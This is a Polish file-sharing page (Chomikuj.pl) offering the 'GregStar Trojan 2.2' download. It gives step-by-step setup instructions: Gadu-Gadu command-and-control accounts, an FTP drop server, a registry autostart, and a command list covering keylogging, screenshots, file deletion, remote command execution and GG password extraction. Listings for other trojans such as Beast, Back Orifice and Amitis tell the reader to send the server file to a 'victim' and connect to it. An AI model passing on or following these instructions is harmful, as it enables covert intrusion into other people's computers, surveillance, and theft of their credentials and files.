Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

GregStar Trojan 2.2.zip

jarusrogus / Programy / Hacker / GregStar Trojan 2.2.zip
Download: GregStar Trojan 2.2.zip

1,71 MB

0.0 / 5 (0 głosów)
Obsługa programu:
1. Ściągamy skompresowany plik o nazwie "GregStar Trojan 2.2"
2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik:
"GST 2.2 - Konfigurator.exe"

Zakładka Połączenia:
Numer GG Serwera - zakładamy nowy nr gg ( Wpisujemy go w Numer GG Serwera )
Hasło - Tutaj podajemy hasło które wpisaliśmy zakładając
nowy nr gg (hasło do tego nr powyżej)
Numer GG Klienta - Tutaj podajemy swój nr gg którego używamy na co dzień, Przez ten nr GG będą wysyłane komendy i odbierane informacje
Zakładka Ftp:
Jeśli nie posiadasz konta ftp to załóż je sobie np. na republice (www.republika.pl)
Host - Tu podajemy Host naszego serwera ftp dla republiki to: ftp.republika.pl
Login - tu wpisujemy nasz login do serwera ftp np. Karol
Haslo - tu podajemy hasło do naszego serwera ftp np. Karol
Zakładka Misc:
Nazwa wpisu w rejestrze - Podajemy nazwę pod jaka serwer będzie wpisany w rejestrze
Lokalizacja - Podajemy gdzie ma się serwer zainstalować Np. C:\Windows\Serwer.exe
Komedy:
info - pokazuje informacje o komputerze
dir - przeglądanie folderu np. dir C:\
procesy - Wyświetlanie uruchomionych procesów
kill - zabijanie wybranego procesu np. kill gg.exe
reset - resetuje komputer
poweroff - wyłącza komputer
screen - zrzut ekranu (wymagany FTP)
delfile - kasowanie wybranego pliku np. delfile C:\plik.exe
deltree - kasowanie katalogu np. C:\katalog
message - pokazuje wiadomość o danej treści np.message hello !!!
hideclock - chowa zegar systemowy
showclock - pokazuje zegar systemowy
myszon - przemienia klawisze myszki
myszoff - przywraca poprzedni stan klawiszy
keyloggeron - Aktywuje keyloggera
hdd - wyświetla wszystkie dyski
keylogger - pokazuje zapisane klawisze
keyloggeroff - De aktywuje keyloggera
cmd - wykonanie polecenia systemowego np. cmd ping 127.0.0.1
powiedz - komputer wypowiada wpisane slowa np. powiedz Hello
batch - po wpisaniu tego polecenia wpisuj komendy batch
batchend - zapisuje wpisane komendy batch do pliku .bat
chat - Uaktywnia czat z ofiara po słowie "chat" wpisujemy nick np. chat Zenek
czatoff - De aktywuje czat
deletegst - kasuje na stale serwer GST
open - otwiera dany plik np. open C:\plik.exe
hideopen - otwiera plik w trybie ukrytym
end - zamyka polaczenie GST
ietekst - zmienia tekst naglowka Internet Explorer np ietekst
Internet Oxplorer
iestartowa - zmienia strone startowa Internet Explorera np.
iestartowa http://xlaski.pl
ggcrack - wyciaga hasla z pliku config.dat np. ggcrack
C:\program files\user\Ja1\config.dat
uptime - pokazuje czas uruchomienia systemu
obroc ekran - obraca ekran do "gory nogami"
maxvol - ustawia glosnosc dzwieku na MAX
Komendy FTP:
ftpon - laczy z serwerem FTP
ftpoff - rozlacza z serwerm FTP
ftpadd - laduje plik na serwer FTP np. ftpadd C:\plik na dysku ofiary.exe
ftpget - sciaga plik z serwera FTP np. ftpget plikNaFtp.exe
ftpdel - kasuje plik na serwerze FTP np. ftpdel plik na serwerze ftp.exe
ftplist - pokazuje wszystkie pliki na serwerze FTP
config ftp - zdalna konfiguracja serwera FTP
cfg klient - zmienia numer GG klienta np. cfg klient 123456
cfg load - Laduje konfiguracje z

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne pliki do pobrania z tego chomika
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Big Ben 3.0.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Big Ben v.3.0 Klient.exe, Big Ben v.3.0 Server.exe, Big Ben v.3.0 Kill Server.exe 3. Plik o nazwie Big Ben v.3.0 Server.exe podrzucamy naszej ofiarze. 4. My zaś otwieramy plik Big Ben v.3.0 Klient.exe. Uruchomi się program widziany na screenie, w którym klikamy na zakładkę "Połączenie" i podajemy adres IP naszej ofiary i klikamy na "Połącz" obrazek ------------------------------------------------------------------------------------------------------------ obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie "Aresinvader.zip" 2. Dekompresujemy ten plik i wchodzimy do folderu. 3. Następnie otwieramy folder "serwery" i widzimy tam dwa pliki: "server na 95,98.exe", "server na wszystkie wersje" Któryś z tych dwóch plików musisz podesłać swojej ofiarze. 4. Ty zaś odpalasz us siebie plik o nazwie "Aresinvader" (czyli plik client). Uruchamia się program widziany na screenie, w którym musisz kliknąć na opcję "Target" i podać adres IP lub HOST ofiary. obrazek
<a>obrazekObsługa programu: 1. Ściągamy skompresowany plik o nazwie Amitis v.1.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Amistis1.3.exe, Comperessor deccompressor.exe, Edit serwer.exe , Serwer.exe, Simulated serwer.exe 3. Najpierw otwierasz u siebie plik "Edit serwer.exe" Służy on do odpowiedniego skonfigurowania trojana. Potem zapisujesz ustawienia. 4. Wysyłasz do ofiary plik "Serwer.exe". Ona go musi u siebie odpalić. 5. Ty zaś otwierasz plik Amistis1.3.exe. Uruchamia się program widziny na screenie. Podajesz adres IP ofiary i łączysz się z zainfekowanym komputerem. <a>obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Beast v2.07 06-08-2004.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: Beast2.07.exe 3. Odpalamy u siebie plik Beast2.07.exe. Uruchamia się program widziany na screenie: obrazek4. Teraz musisz stworzyć plik serwer, który podrzucisz ofiarze. Klikasz na opcję "Build serwer" (zaznaczyłem tę opcje powyżej kolorem czerwonym) 5. Kiedy klikniesz na opcję "Build serwer" uruchomi się program widziany na screenie: obrazek Jak już odpowiednio skonfigurujesz trojana to klikasz na opcje "Save serwer" 6. Powstaje trojan który musisz podrzucić ofiarze. Ona go musi otworzyć. Ty zaś musisz otworzyć plik Beast2.07.exe Teraz podajesz Host ofiary i łączysz się zdalnie z zainfekowanym komputerem.
Obsługa programu: 1. Ściągamy plik Hack A Tack v.1.20 new.zip 2. Dekompresujemy ten plik i wchodzimy do tego folderu. 3. Widzimy pliki o nazwach: Hack'a Track Clinet 1.20.exe, Serwer.exe 4. Plik serwer wysyłamy do naszej ofiary. My zaś odpalamy plik Hack'a Track Clinet 1.20.exe. Uruchamia się program widziany na screenie, w którym musimy podać IP ofiary i kliknąć na connect. obrazek
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie Angel 1.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy pliki: Angel 1.2.exe, bezpieczny serwer.exe, Serwer.exe 3. Plik Serwer.exe wysyłamy do naszej ofiary. Tego pliku nie wolno otwierać, bo by się trojan zagnieździł w naszym systemie, a tego byśmy przecież nie chcieli :) 4. Następnie odpalamy u siebie plik Angel 1.2.exe. Uruchamia się program widziany na screenie w którym musimy podać adres IP naszej ofiary i kliknąć na Połącz. obrazekGdybyś chciał przetestować tego trojana na własnym kompie to: 1. Otwierasz plik bezpieczny serwer.exe (działa on na tej zasadzie że trojan się uruchomi na twoim kompie tylko nie doda się do auto startu i rejestru, więc dlatego jest nazwany bezpiecznym :) 2. Na razie nie zamykasz tego programu, tylko otwierasz plik Angel 1.2.exe w którym podajesz swój adres IP i klikasz na połącz. 3. Gotowe. Teraz możesz wykonywać komendy za pomocą pliku client (czyli Angel 1.2.exe) na własnym kompie. PS: Oczywiście plik bezpieczny serwer.exe służy tylko i wyłącznie do testowania trojana na własnym kompie. Do swojej ofiary musisz wysłać plik serwer.exe
Obsługa programu: 1. Ściągamy skompresowany plik o nazwie BackOrifice.zip 2. Dekompresujemy ten plik i wchodzimy do folderu. Z całego zdekompresowanego folderu nas interesują w szczególności dwa pliki: BOGUI.EXE, BOSERVE.EXE 3. Plik o nazwie BOSERVE.EXE wysyłamy do naszej ofiary. 4. My zaś z kolei odpalamy u siebie plik BOGUI.EXE (czyli cleint) Uruchamia się program widziany na screenie, w którym podajemy Host ofiary i wykonujemy zdalne polecenia na jej komputerze. obrazek
Obsługa programu: 1. Trojan jedynie z opcja przeglądania dysku. Na protokole FTP. 2. Ściągamy skompresowany plik o nazwie FTPHDD.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. Widzimy plik: FTP2HDD.exe. 4. Odpalamy plik FTP2HDD.exe. Uruchamia się program widziany na screenie: obrazek5. Klikamy na opcję "Generuj serwer" Powstaje plik, który musimy wysłać do naszej ofiary. Ofiara musi go otworzyć. 6. Teraz klikasz na opcję "Używanie". Tam jest dalsza część instrukcji obsługi. Chyba wszystko jasne: ;] obrazek
Obsługa programu: 1. Trojan służący do kradzieży haseł GG, a co za tym idzie konta GG. 2. Ściągamy skompresowany plik o nazwie Gadu wireader 1.zip 3. Dekompresujemy ten plik i wchodzimy do folderu. 3. Odpalamy u siebie plik gadu_wireader1.4.exe, czyli plik client. Otwiera się program widziany na screenie: obrazek4. Uzupełniany wszystkie okienka swoimi danymi i klikamy na opcję utwórz trojana. 5. Następnie utworzony plik (czyli trojan) wysyłamy do naszej ofiary.
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności